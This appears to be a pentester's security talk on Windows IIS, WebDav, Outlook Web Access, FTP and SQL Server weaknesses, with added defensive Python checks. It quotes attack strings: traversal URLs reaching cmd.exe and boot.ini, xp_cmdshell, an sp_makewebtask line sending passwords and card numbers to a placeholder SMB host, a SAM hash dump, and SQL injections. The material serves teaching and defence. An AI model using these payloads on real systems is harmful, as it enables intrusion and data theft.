Analyst at Digital Defense
– 5 years experience penetration testing
– Contact: [email protected]
• Digital Defense
– Founded January 2000
– Provide recurring assessment services
– Specialize in the financial industry

sit through this?
– Learn how crackers get in
– Learn how to assess your own systems
– See why network worms are so effective
– Demonstrate why a patch needs to be applied
– Actually verify that a patch worked
– Check new software for related problems

Windows?
– Over 30% of all web sites run on Windows
– Popular online banking and e-commerce platform
– Incredibly easy to install and start using
– Most services have insecure default settings
– Isn't it secure with patches? Just wait a week...

IIS?
– Microsoft's Web Server product
– Standard component of Windows 2000+
– Aims to be easy to use and extend
– Horrible security architecture
– Most features are enabled by default
– Every version to date has been vulnerable to a remote shell-granting attack in its default configuration.

used?
– Corporate Web Sites
– E-Commerce Sites
– Online Banking Systems
– Intranet/Internal Sites
– With other products
  • Sendmail for Windows
– Various "appliances"
  • Cisco VoIP systems

used?
– Provided with the operating system
– Very user-friendly configuration
– Large number of ASP/CF developers
– Huge feature set, easy to extend
– Integrates with a Windows network
– Decent performance by comparison
an ISAPI extension?
– Adds functionality to IIS
– Usually in the form of a DLL
– ASP, CFML, PHP are extensions
– Usually tied to a specific suffix (.asp, .ida)
• Types of security problems
– Buffer Overflows
– Information Disclosure

they such a security risk?
– Code is not as well reviewed as core IIS
– Extensions are enabled by default
– Extension code can execute as SYSTEM
• Where are the extensions shown?
– Open Internet Services Manager
– Select Web Site -> Properties
– Home Directory -> Configuration

Execution
– Overflow in ISM.dll (.htr)
  • Overflow in URL at ~3000 bytes
  • Exploit code was released 2 years ago
  • Only affects pre-SP6 IIS 4.0 servers
– Overflow in IDQ.dll (.idq)
  • Overflow in Host header at ~220 bytes
  • "Code Red" used this to propagate
  • Affects both IIS 4.0 and 5.0

Execution
– Overflow in MSW3PRT.dll (.printer)
  • Overflow is in the Host: header at ~240 bytes
  • Exploit code in wide circulation and very effective
  • Affects Windows 2000 / IIS 5.0 only
– Overflow in ActiveState PerlIIS.dll (.plx)
  • Overflow in URL at ~340 bytes
  • Exploit code in circulation
  • Affects ActiveState Perl 5.6.1 < build 630

(almost)
– There are only a few extensions most people actually need: .asp, .asa, .shtml, .shtm.
– Extensions like .php and .cfml are usually OK provided that they are at the latest patch level.

with sample scripts
– Demonstrate possibly dangerous features
– Included as part of a default install
– Have absolutely no access control
– Unaffected by service packs and hotfixes
– Often located on a different volume and added as a virtual directory, allowing other vulnerabilities to be exploited further.
Traversal?
– Most file systems use two special directory names to refer to the current and parent directory.
– A single period "." refers to the current directory.
– A double period ".." refers to the directory above.
– Directory traversal bugs rely on these special directory names to access files outside of the defined root directory.

Win9x "..."
– Windows 9x supports multiple-dot parent paths
  • http://server/.............../autoexec.bat
  • http://server/....../windows/command.com?echo+hello
– Works on Win9x machines running IIS or PWS
– Other web servers on Win9x have been vulnerable

UNICODE
– Windows supports a two-byte character encoding system called "UNICODE".
– Alternate character sets can be used to make web requests by sending their hex-encoded values.
– The "/" and "\" characters can be represented with their UNICODE counterparts, and older IIS versions will then serve requests for files outside the web root.
– Affects IIS 4.0 and IIS 5.0
– Other web servers may be affected

UNICODE
– Example: (%c0%af = "/")
  • http://server/..%c0%af..%c0%af../boot.ini
– Number of variations depends on installed languages
– Possible to execute \winnt\system32\cmd.exe
– Exploited by many different worms
– Very popular exploit among "kids"

Double Decode
– Requests for files in an executable directory are hex-decoded twice, and the final result is not checked for parent paths.
– Example:
  • %25 = "%" AND %5c = "\"
  • Request: http://server/scripts/..%255c../
  • First Decode: http://server/scripts/..%5c../
  • Second Decode: http://server/scripts/..\../
– IIS 3.0, 4.0, 5.0 are affected
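A defender-side check, added here and not part of the original slides, that normalises a request path the way these three bugs do (Win9x multi-dot names, overlong UTF-8 such as %c0%af, and a second round of percent-decoding) and flags any path that climbs above the web root. The sample request paths are constructed; a server would run this before touching the file system, and a log analyst can run it over the request column of an IIS log.

```python
from urllib.parse import unquote_to_bytes

# Constructed request paths (not real log lines) in the forms the slides
# describe: plain, Win9x multi-dot, overlong UTF-8 "UNICODE", double-encoded.
SAMPLE_REQUESTS = [
    "/scripts/index.asp",
    "/......./windows/command.com?echo+hello",
    "/..%c0%af..%c0%af../boot.ini",
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
]

def fold_overlong_utf8(raw: bytes) -> bytes:
    """Collapse 2-byte overlong encodings of ASCII, e.g. C0 AF -> '/'."""
    out, i = bytearray(), 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)

def normalize(path: str, rounds: int = 2) -> str:
    """Decode like a lenient server: `rounds` passes of percent-decoding,
    overlong UTF-8 folded after each pass, backslash treated as slash."""
    raw = path.split("?", 1)[0].encode("latin-1")
    for _ in range(rounds):
        raw = fold_overlong_utf8(unquote_to_bytes(raw))
    return raw.decode("latin-1").replace("\\", "/")

def escapes_root(path: str, rounds: int = 2) -> bool:
    """True if the decoded path climbs above the web root. Any all-dot
    segment ("..", "...", "......") counts as a parent reference, since
    Win9x honours the multi-dot forms."""
    depth = 0
    for seg in normalize(path, rounds).split("/"):
        if seg in ("", "."):
            continue
        if set(seg) == {"."}:
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def flag_traversals(requests, rounds: int = 2):
    """Return the requests that escape the root after `rounds` decodes."""
    return [r for r in requests if escapes_root(r, rounds)]
```

With rounds=1 the double-encoded request passes as a harmless file name; only the second decode exposes the parent path, which is exactly the check IIS skipped.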
– DAV is Distributed Authoring and Versioning
– WebDav provides content management via HTTP
– WebDav is accessed as HTTP methods
– XML is used for complex requests
– A "normal" web request: GET / HTTP/1.0
– A WebDav request: PUT /newpage.html HTTP/1.0

– OPTIONS
  • OPTIONS / HTTP/1.0
  • Returns a list of allowed HTTP methods
  • Methods in Allow: are accessible
– SEARCH
  • Able to retrieve a directory listing through XML

– PUT
  • Common among misconfigured IIS 4.0 servers
  • Allows direct file uploads via WebDav (FrontPage)
– DELETE
  • Common among misconfigured IIS 4.0 servers
  • Allows deletion of any file in the web root

– MOVE
  • Common among misconfigured IIS 4.0 servers
  • Allows you to move any file or directory
– MKDIR/MKCOL
  • Only found on machines with really bad permissions
  • Allows creation of directories

– COPY
  • Most servers allow this, but it rarely works
  • COPY / HTTP/1.0
  • Destination: http://nuthaserver/newdir/
– PROPFIND
  • Allowed by default
  • Needs XML input to do anything interesting
  • Various DoS attacks with long arguments to this command
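A small audit helper, added here rather than taken from the slides, that reads an OPTIONS response and reports which of the WebDav methods listed above the server advertises, so the result can be compared against what the site actually needs. Both responses are constructed; the helper assumes the method list may appear in either the Allow: or the Public: header, since IIS of that era sent both.

```python
# Constructed OPTIONS response modelled on an IIS 5.0 host with WebDAV and
# FrontPage extensions left enabled; not a capture from a real server.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "DAV: 1, 2\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Same host after WebDAV is disabled: only the methods a plain web site needs.
HARDENED_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Allow: OPTIONS, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n\r\n"
)

# Methods the slides single out, with what each permits on a misconfigured server.
RISKY_METHODS = {
    "PUT": "direct file upload into the web root",
    "DELETE": "deletion of files in the web root",
    "MOVE": "moving any file or directory",
    "MKCOL": "directory creation",
    "COPY": "copying content to another location",
    "SEARCH": "directory listing through XML",
    "PROPFIND": "XML property queries; DoS with long arguments",
}

def parse_headers(response: str) -> dict:
    """Return the response headers as a {lower-case name: value} dict."""
    head = response.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def allowed_methods(response: str) -> set:
    """Union of the Allow: and Public: method lists (IIS sent both)."""
    headers = parse_headers(response)
    methods = set()
    for name in ("allow", "public"):
        methods |= {m.strip().upper() for m in headers.get(name, "").split(",") if m.strip()}
    return methods

def risky_methods(response: str) -> dict:
    """Map each advertised risky method to the exposure it represents."""
    return {m: RISKY_METHODS[m] for m in sorted(allowed_methods(response)) if m in RISKY_METHODS}
```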
is practically guaranteed by the number of vulnerabilities in a default installation.
• Microsoft's "feature push" strategy to encourage upgrades ensures there will always be new vulnerabilities.
• The amount of effort, knowledge, and time required to effectively secure an IIS server means that only experienced, security-aware administrators have a chance of succeeding.
• Microsoft is making attempts to simplify the assessment and patching process by releasing free security tools.

IMS?
– IMS supports the Simple Mail Transfer Protocol
– Part of the Windows NT 4.0 Option Pack
– Comes standard with Windows 2000
– Aims to be easy to use and configure
– Often overlooked when it comes to security

– "Bounce" messages can contain sensitive information about a company's internal network and domain
– The AUTH and XAUTH commands can be used to brute-force user accounts through SMTP

are misconfigured or buggy in a way that allows spam relaying.
• The SMTP service can be used to gather sensitive information about a network.
• While a few DoS conditions exist, newer versions of Windows automatically restart a crashed service.

Outlook Web Access?
– Web mail client for Microsoft Exchange
– Runs on top of IIS 4.0 or 5.0
– Emulates the Outlook interface
– Written in ASP, uses COM+ objects

exist?
– All IIS vulnerabilities apply
– Defaults to clear-text HTTP transport
– Anonymous access enabled by default
– Allows exploitation of client-side bugs

IIS
– Many people forget to include OWA machines when applying patches to their "web servers"
– Crackers and worms don't care what it is, as long as it's running the IIS web server
– Cracking the OWA machine provides full access to the login and mail ASP scripts
Text
– Many people run OWA across regular HTTP, allowing their login and email to be easily sniffed
– Enabling SSL is not too difficult, provided you know how to configure SSL under IIS.

Default
– A default install allows full access to the Global Address List to unauthenticated users
– "Public Folders" are exactly that: viewable by anyone able to access the server

Side Bugs
– It is possible to embed a hostile application into an email message and force it to run when a user reads their email via Internet Explorer
– There are various "Cross Site Scripting" issues with OWA which could allow someone to read any cookies or email contents

is a fairly dangerous application to maintain just to provide access to email over the web.
• The actual OWA scripts have been proven to be pretty solid; most of the issues are with the underlying IIS server or the default config.
• If you do run OWA, please stay on top of IIS patches, disable anonymous access, and keep sensitive information out of "Public Folders".

the FTP service?
– The File Transfer Protocol
– THE method of transmitting stored files
– Part of the Windows NT 4.0 Option Pack
– Comes standard with Windows 2000
– Easy to configure and use

exist?
– Unencrypted login and transfer
– Anonymous access by default
– Predictable PASV port selection
– SITE STATS information leak
– STAT globbing attack
transfer
– Authentication information is sent in clear text and is trivial to capture
– The actual file transfers are unencrypted and easy to sniff and extract

Default
– The default installation allows access using the standard "anonymous" and "ftp" accounts
– Systems with bad permissions on the FTP root are automatically turned into warez servers for the various pirate groups

– FTP uses one connection from the client to port 21 on the server as the "control" port
– Directory listings and file transfers are done via a second connection
– Active FTP uses a connection from the server to the client
– Passive FTP opens a port on the server and the client connects to it

– Many FTP servers use single-incrementing port numbers for the "passive" data port
– With MS FTP 4.0, it is possible to guess the next data port and steal another user's file transfer
– With MS FTP 5.0, a hijack attempt will just disconnect and the client's FTP session becomes unusable
– Automated tools exist to exploit this

Leak
– The SITE STATS feature shows how many times each FTP command has been executed
– An anonymous user can profile an FTP server to determine when other users are logging on
– The statistics can reveal what privileged commands are being executed and at what time
– Usage profiles can be used in conjunction with the PASV port attack to steal scheduled transfers
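An added example (not from the original talk) that parses 227 PASV replies and tests whether successive data ports step by exactly one, the behaviour described above for MS FTP 4.0. The reply lines are constructed; the check is meant to be run against your own server's control channel to confirm whether a patched or replaced FTP service still hands out predictable data ports.

```python
import re

# 227 reply: "... (h1,h2,h3,h4,p1,p2)" where the data port is p1 * 256 + p2.
PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

# Constructed 227 replies to consecutive PASV commands (not a capture from a
# real server). The first set steps the data port by one each time.
SEQUENTIAL_PASV_REPLIES = [
    "227 Entering Passive Mode (192,168,1,10,4,7).",
    "227 Entering Passive Mode (192,168,1,10,4,8).",
    "227 Entering Passive Mode (192,168,1,10,4,9).",
    "227 Entering Passive Mode (192,168,1,10,4,10).",
    "227 Entering Passive Mode (192,168,1,10,4,11).",
]
RANDOMISED_PASV_REPLIES = [
    "227 Entering Passive Mode (192,168,1,10,200,17).",
    "227 Entering Passive Mode (192,168,1,10,12,140).",
    "227 Entering Passive Mode (192,168,1,10,133,2).",
    "227 Entering Passive Mode (192,168,1,10,61,250).",
]

def pasv_endpoint(reply: str):
    """Parse a 227 reply into (host, port)."""
    m = PASV_RE.match(reply)
    if not m:
        raise ValueError("not a 227 PASV reply: %r" % reply)
    host = ".".join(m.group(i) for i in range(1, 5))
    return host, int(m.group(5)) * 256 + int(m.group(6))

def pasv_predictability(replies):
    """Summarise how the data port moves between successive PASV replies.
    'sequential' is True when every step is +1 (the MS FTP 4.0 pattern);
    'unit_steps' counts the +1 steps so a mostly-sequential server shows up too."""
    ports = [pasv_endpoint(r)[1] for r in replies]
    steps = [b - a for a, b in zip(ports, ports[1:])]
    unit = sum(1 for s in steps if s == 1)
    return {
        "ports": ports,
        "unit_steps": unit,
        "sequential": bool(steps) and unit == len(steps),
    }
```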
was never designed with security in mind.
• The secondary data channel does not require authentication and is trivial to hijack.
• If you must run FTP, please encrypt AND sign your files before transferring.

SQL Server?
– Microsoft's relational database product
– Originally based on the Sybase engine
– Often installed with other products
– Ships by default on many vendor machines
– "Personal" editions exist for client systems
– Popular backend for web applications
  • E-Commerce
  • Financial Services

– Service runs as Administrator or SYSTEM
– Default accounts are the biggest problem
– SQL user-level privilege escalation
– Service is easily located on the network
– Dangerous stored procedures
– Syntax optimal for SQL insertion attacks

Administrator or SYSTEM
– A compromise of the "sa" account results in full access to the entire system
– Any bugs in the listening service or query parser could result in a complete system compromise

the Biggest Problem
– The all-powerful "sa" account often has no password set; newer versions try to force one.
– The "probe" account in 6.5 is unprivileged, but gaining "sa" access is trivial in that version.
– A network worm appeared in late November 2001, exploiting the default "sa" account and propagating via stored procedures.
Located on the Network
– Use the SQLPing utility
– Use osql -L
– SQL Server can use these transports:
  • TCP/IP (TCP 1433, UDP 1433, 1434)
  • MS RPC (dynamic ports)
  • Named Pipes
  • IPX/SPX / AppleTalk / Banyan Vines

– The infamous xp_cmdshell
  EXEC master..xp_cmdshell "cmd.exe /c ..."
– Sending query results back to you via SMB
  EXEC master..sp_makewebtask "\\ip\tmp\test.html", "SELECT username, password, cc FROM users"
– Dump the SAM password hashes via xp_regread
  EXEC xp_regread HKLM, 'SECURITY\SAM\Domains\Account', 'F'

SQL Insertion Attacks
– Queries can be stacked via semi-colon
  SELECT * FROM cats WHERE id = 4; UPDATE USER SET ...
– Comments can be inserted inline
  SELECT * FROM users WHERE user = 'bob';-- ' AND password = "bad password"
– The engine provides verbose error messages about SQL syntax problems
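The comment-based login bypass above, shown beside the parameterised fix, as an added example that is not part of the original slides. It uses Python's sqlite3 as a stand-in for SQL Server with a constructed users table; because sqlite3's execute() accepts only one statement, the semicolon-stacking case is not demonstrated, only the inline comment.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the users table (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("bob", "s3cret"), ("alice", "hunter2")])
    return con

DB = make_db()

def login_vulnerable(user: str, password: str):
    """Builds the query by concatenation, so the caller's input becomes SQL.
    With user = "bob';-- " the password clause is commented out and the
    row for bob comes back regardless of the password supplied."""
    sql = ("SELECT user FROM users WHERE user = '" + user +
           "' AND password = '" + password + "'")
    return DB.execute(sql).fetchone()

def login_parameterised(user: str, password: str):
    """Binds the values as parameters: the input can only ever be data,
    so "bob';-- " is looked up literally as a user name and finds nothing."""
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return DB.execute(sql, (user, password)).fetchone()

if __name__ == "__main__":
    payload = "bob';-- "
    print("concatenated :", login_vulnerable(payload, "bad password"))    # ('bob',)
    print("parameterised:", login_parameterised(payload, "bad password"))  # None
```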
account is almost always equivalent to having local Administrator access to the SQL Server machine (hint: don't run a database on your DCs).
• Since SQL Server supports so many different network protocols, a simple packet filter on ports 1433/1434 is usually not enough to restrict access.
• Recent versions of MS-SQL (2k+) are slightly more secure out of the box; the "Typical" install only allows Domain Authentication.